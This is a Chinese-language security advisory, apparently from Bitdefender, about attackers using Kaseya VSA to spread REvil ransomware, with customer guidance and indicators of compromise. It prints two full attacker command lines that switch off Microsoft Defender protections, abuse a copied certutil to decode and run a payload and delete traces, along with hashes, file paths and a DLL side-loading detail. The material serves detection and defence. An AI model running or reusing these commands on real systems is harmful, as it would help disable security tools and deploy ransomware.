自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

Bitdefender安全通告:黑客使用Kaseya IT管理軟件來分發(fā)REvil勒索病毒

作者:佚名
安全
2021 年 7 月 3 日美國東部時間上午 10:00  ,遠程IT管理軟件廠商Kaseya發(fā)布了緊急安全通告,Kaseya 的 VSA 產(chǎn)品成為復雜網(wǎng)絡攻擊的受害者,攻擊者正在使用Kaseya來分發(fā)REvil勒索病毒。

2021 年 7 月 3 日美國東部時間上午 10:00  ,遠程IT管理軟件廠商Kaseya發(fā)布了緊急安全通告,Kaseya 的 VSA 產(chǎn)品成為復雜網(wǎng)絡攻擊的受害者,攻擊者正在使用Kaseya來分發(fā)REvil勒索病毒。

Kasaya安全通告:

“我們繼續(xù)強烈建議我們的本地客戶的 VSA 服務器保持關閉狀態(tài),直至另行通知。我們還將保持 SaaS 服務器離線,直至另行通知。  

我們的外部專家建議我們,遇到勒索軟件并收到攻擊者通信的客戶不應點擊任何鏈接——它們可能被武器化。”    

公告原文:https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689

Bitdefender正在積極監(jiān)控和分析使用 Kaseya 發(fā)動的高級攻擊,Bitdefender迄今為止的調查結果表明,Bitdefender 解決方案可檢測并阻止攻擊中使用的命令行操作和交付的惡意payload,從而保護Bitdefender客戶免受此次復雜的攻擊。 

由于這是一個不斷變化的情況,我們將在可用時使用其他信息更新這篇文章。  

Bitdefender 客戶指南:  

Kaseya 安全公告, 懇請其客戶立即關閉本地 VSA 服務器。我們建議任何 Kaseya VSA 用戶立即遵循此指南。  

檢查本地和混合環(huán)境中的已知IoC指標 (IoC)  -  IoC 列表如下。 

美國網(wǎng)絡安全和基礎設施安全局 (CISA) 已 發(fā)布 警報 ,稱他們正在監(jiān)控有關針對 Kaseya VSA 和使用 VSA 軟件的多個 MSP 的攻擊的詳細信息。我們建議組織遵循 CISA 警報以獲取未來更新。

經(jīng)過驗證的IoC指標 :

1. 從 Kaseya 代理執(zhí)行的命令行: 

C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 -n 5825 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

和 

C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 3637 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\WaRCoMWorking\agent.crt c:\WaRCoMWorking\agent.exe & del /q /f c:\WaRCoMWorking\agent.crt C:\Windows\cert.exe & c:\WaRCoMWorking\agent.exe

2. 哈希: 

561cffbaba71a6e8cc1cdceda990ead4,Bitdefender 在 2021 年 5 月 15 日已檢測到,檢測為 Gen:Variant.Graftor.952042。這是使用 certutil.exe 加密的主要可執(zhí)行文件 ( c:\kworking\agent.exe) 

a47cf00aedf769d60d58bfe00c0b5421,Bitdefender 在 2021 年 5 月13 日已檢測到,檢測為  Gen:Variant.Bulz.471680。這是一個由主可執(zhí)行文件投遞并使用 MS msmpeng.exe 可執(zhí)行文件側面加載的 DLL。   

0293a5d21081a94a5589976b407f5675 – agent.crt 的哈希值(agent.exe 解密前的內容)。 

3. 文件路徑:

c:\WarCoMWorking\agent.crt 

c:\\WarCoMWorking\agent.exe 

c:\kworking\agent.exe 

c:\kworking\agent.crt 

c:\windows\msmpeng.exe(較舊的版本,容易受到 DLL 側加載的影響)。此版本被主要可執(zhí)行文件投遞,并進一步用于加載 DLL (a47cf00aedf769d60d58bfe00c0b5421)。文件版本:MsMpEng.exe,Microsoft 惡意軟件保護,4.5.0218.0    

正在使用Bitdefender EDR的客戶,可以使用IOC掃描功能,在全網(wǎng)中地毯式搜索IOC指標:

添加黑名單規(guī)則:在黑名單區(qū)域,可以添加上述IOC的哈希,全網(wǎng)阻斷運行: 

 

責任編輯:Blue 來源: IT168
勒索病毒
相關推薦

2021-07-05 14:07:53

黑客網(wǎng)絡安全網(wǎng)絡攻擊

2021-07-08 15:51:26

Coop勒索軟件攻擊Kaseya

2021-09-17 13:27:09

勒索病毒

2021-07-06 13:55:32

REvil勒索軟件漏洞

2017-06-28 02:25:23

2021-07-07 10:40:49

勒索軟件攻擊贖金

2021-06-22 19:56:13

勒索病毒

2017-07-05 11:23:38

勒索病毒網(wǎng)絡安全企業(yè)數(shù)據(jù)

2009-04-02 13:49:58

Kaseya終端管理IT服務

2017-05-13 15:20:51

2021-08-10 11:42:45

勒索軟件網(wǎng)絡攻擊數(shù)據(jù)泄露

2022-01-17 12:44:15

勒索軟件REvil惡意軟件

2021-04-24 09:39:26

勒索軟件蘋果威脅泄露

2021-09-10 09:54:38

勒索軟件REvil

2021-07-11 17:31:13

勒索軟件攻擊Kaseya

2020-05-22 09:40:51

勒索軟件黑客暗網(wǎng)

2021-07-05 18:50:22

供應鏈攻擊勒索軟件漏洞

2021-09-14 14:55:17

REvil勒索軟件網(wǎng)絡攻擊

2021-10-04 19:06:12

REvil勒索軟件黑吃黑

2010-05-31 14:56:59

SVN版本管理軟件
點贊
收藏

51CTO技術棧公眾號